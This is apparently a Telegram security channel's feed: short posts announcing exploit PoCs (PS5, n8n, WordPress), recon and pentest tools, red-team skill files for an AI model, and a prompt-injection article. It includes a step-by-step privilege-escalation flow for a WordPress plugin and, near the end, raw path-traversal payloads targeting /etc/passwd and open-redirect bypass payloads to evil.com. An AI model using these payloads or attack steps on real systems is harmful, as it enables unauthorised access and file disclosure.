Root Access Club
284 subscribers
90 photos
1 video
109 links
RootAccessClub ๐Ÿ’Ž

Security knowledge & research ๐Ÿ”Ž

Understanding systems, not abusing them โ›”๏ธ

โš ๏ธ Educational purposes only
Download Telegram
PSAITO โ€“ New PS5 WebKit Research ToolExperimental toolkit for PS5 ๐Ÿซฏ

firmware 9.00 โ€“ 13.60 โœ…

Browser only exploit that gives memory read/write + syscall primitives inside the WebKit process
โœจ

Research only โš ๏ธ

GitHub ๐Ÿ”—

๐Ÿฅ‡@RootAccessClub
knife โ€“ A reverse engineer's toolkit in Rust ๐Ÿ”ช

Parse, triage, disassemble, and audit PE, ELF, and Mach-O from one small binary. Static only: it reads the bytes on disk and never runs the target ๐ŸŽฏ

GitHub ๐ŸŒ

ยฉ @RootAccessClub
โคโ€๐Ÿ”ฅ2โšก1
Claude Red ๐ŸŒช

Offensive security skills for Claude a collection of "SKILL.md" files designed to turn Claude into a more context aware red team assistant

Covers areas like web security, AD, cloud, recon, exploit development, EDR evasion, and more
โญ๏ธ

GitHub ๐Ÿ”—

๐Ÿ›ก๏ธ@RootAccessClub
๐Ÿ”ฅ3
XSS Labs๐Ÿ”ฌ

An intentionally vulnerable lab environment for practicing XSS across different contexts, including Reflected, Stored, DOM-based, and JavaScript based XSS

A practical resource for learning how XSS works and how to mitigate it ๐Ÿ•ท๏ธ

Github ๐Ÿงช

โšก๏ธ @RootAccessClub
โคโ€๐Ÿ”ฅ4
CVE-2026-12793 โ€“ JetFormBuilder WordPress Plugin ๐Ÿ†˜

Critical vulnerability (CVSS 9.8) โš ๏ธ

Affects versions โ‰ค 3.6.2
Unauthenticated privilege escalation


Fixed in version 3.6.2.1 and later โœ…

Attack Flow :

1โƒฃ Detect JetFormBuilder + version โ‰ค 3.6.2 (readme.txt)

2โƒฃ Discover form ID from public pages (data-form-id, /register/, etc.)

4โƒฃ POST to referer page with ?jet_form_builder_submit=submit&method=ajax

4โƒฃ Register User action runs โ†’ new WP user created


If you're using this plugin, update immediately โ€ผ๏ธ

GitHub โ›“โ€๐Ÿ’ฅ

@RootAccessClub
OWASP Amass ๐Ÿ”Ž

An open source framework for network mapping and attack surface discovery

โ€ข Subdomain & DNS enumeration
โ€ข OSINT-based asset discovery
โ€ข Infrastructure mapping
โ€ข External attack surface analysis


Built by OWASP, Amass is a solid reconnaissance tool for security researchers and bug bounty hunters โญ๏ธ

GitHub ๐Ÿ”—

๐Ÿ’Ž @RootAccessClub
๐Ÿ”ฅ2
Legion โ€” Automated Network Pentesting ๐Ÿ›ก๏ธ

Legion is a GUI based network penetration testing framework built to automate reconnaissance, scanning, service enumeration, and vulnerability discovery

๐Ÿ”ธ Nmap, Nikto, WhatWeb, Hydra, SMBenum

๐Ÿ”น CVE & vulnerability mapping

๐Ÿ”ธ Automated scanning & enumeration

Github ๐Ÿ”—

๐Ÿ“ก @RootAccessClub
โคโ€๐Ÿ”ฅ2
CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain ๐Ÿ’ฅ

Unauthenticated Arbitrary File Read โ†’ Admin Token Forge โ†’ Sandbox Bypass โ†’ RCE ๐ŸŒช

CVSS : 10.0 + 9.9 (Critical) โš ๏ธ
Fixed : 1.121.0 (AFR) / 1.120.4+ (RCE) โœ…


Github ๐ŸŒ

๐ŸชŽ @RootAccessClub
โคโ€๐Ÿ”ฅ1
Osintgram ๐Ÿ‘ฅ

An open source OSINT framework for Instagram reconnaissance and information gathering ๐Ÿ”Ž

Key Features:

โ€ข Profile & content analysis
โ€ข Followers / Following analysis
โ€ข Hashtag & location searches
โ€ข Media and metadata analysis
โ€ข Account comparison
โ€ข Interactive Web UI
โ€ข AI assisted mode with local Ollama support
โ€ข JSON & HTML report generation


GitHub ๐Ÿ”—

โš ๏ธ Use responsibly and only with data you are authorized to investigate

๐Ÿ’Ž @RootAccessClub
โคโ€๐Ÿ”ฅ4
WordPress Critical RCE ๐Ÿšจ

CVE-2026-87902 | CVSS 9.2 ๐Ÿซฏ

A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐Ÿ’ฃ

Affected versions span 4.7 โ†’ 7.1.1 ๐Ÿฆ 

๐Ÿ›ก๏ธ Fix: Update to the latest patched WordPress release for your branch

GitHub ๐Ÿ”—

@RootAccessClub
๐Ÿ”ฅ2
Root Access Club
WordPress Critical RCE ๐Ÿšจ CVE-2026-87902 | CVSS 9.2 ๐Ÿซฏ A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐Ÿ’ฃ Affected versions spanโ€ฆ
CVE-2026-87902 ๐Ÿชค

PoC for CVE-2026-87902 โ€“ unauthenticated path traversal in WordPress page-template resolution (local PHP inclusion, conditional RCE) with a pinned vulnerable lab

GitHub ๐Ÿ”—

โš ๏ธ Authorized security testing, education, and defensive research only

๐Ÿ’Ž @RootAccessClub
๐Ÿ”ฅ2
Prompt Injection in the Wild ๐Ÿ’‰

A look at real world In Page Prompt Injection attacks, where malicious instructions are hidden inside web content and processed by AI systems

Link ๐Ÿ”—

@RootAccessClub
๐Ÿ”ฅ3
AutoPWN Suite โšก๏ธ

An automated penetration testing framework designed to streamline reconnaissance, vulnerability discovery, and security testing โœจ

โ€ข Nmap-based network & service enumeration
โ€ข CVE & vulnerability discovery
โ€ข Automated exploit searching
โ€ข Web vulnerability testing
โ€ข Directory enumeration
โ€ข Web UI + REST API
โ€ข Scan scheduling & automation
โ€ข Email / Webhook notifications
โ€ข Optional evasion techniques

GitHub ๐Ÿ”—

๐ŸŒช @RootAccessClub
โคโ€๐Ÿ”ฅ3
Relapse โ€“ PS5 Jailbreak Exploit ๐ŸŽฎ

A new exploit chain called Relapse has been released, targeting PS5 firmware versions 7.00 through 13.60 ๐ŸŽฏ

๐Ÿ”น WebKit Exploit
๐Ÿ”น Kernel Exploit
๐Ÿ”น Execution of unofficial payloads
๐Ÿ”น Support for payloads such as kstuff and etaHEN


When successfully executed, Relapse can enable a Jailbreak environment and allow execution of unofficial code and payloads on the PS5 ๐Ÿ’ฅ

โš ๏ธ Check your console's firmware version before attempting anything

GitHub ๐Ÿ”—

๐ŸชŽ @RootAccessCLUB
โšก2
Path Traversal Bypasses โšก๏ธ

Null Byte Injection
../../../etc/./passwd%00.png

Stripped Dot-Dot-Slash
..././..././..././e../tc..//pas../swd

Multi-Stage Decoding
..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32F/passwd

Truncation Appending (4096 bytes)
../../../etc/./passwd/././././././

โญ๏ธ @RootAccessClub
SubZer0 ๐Ÿ‘€โ„๏ธ

Soon โณ
โšก2๐Ÿ”ฅ1
Open redirects filter bypass payloads ๐Ÿ’ฅ

---->\/evil.com
---->\/\/evil.com
---->\\evil.com
----//evil.com
---->//theirsite@evil.com
---->////evil.com
----//google%E3%80%82com
---->//%2F/evil.com
---->////evil.com
---->/%2F/yoururl.com

๐ŸชŽ @RootAccessClub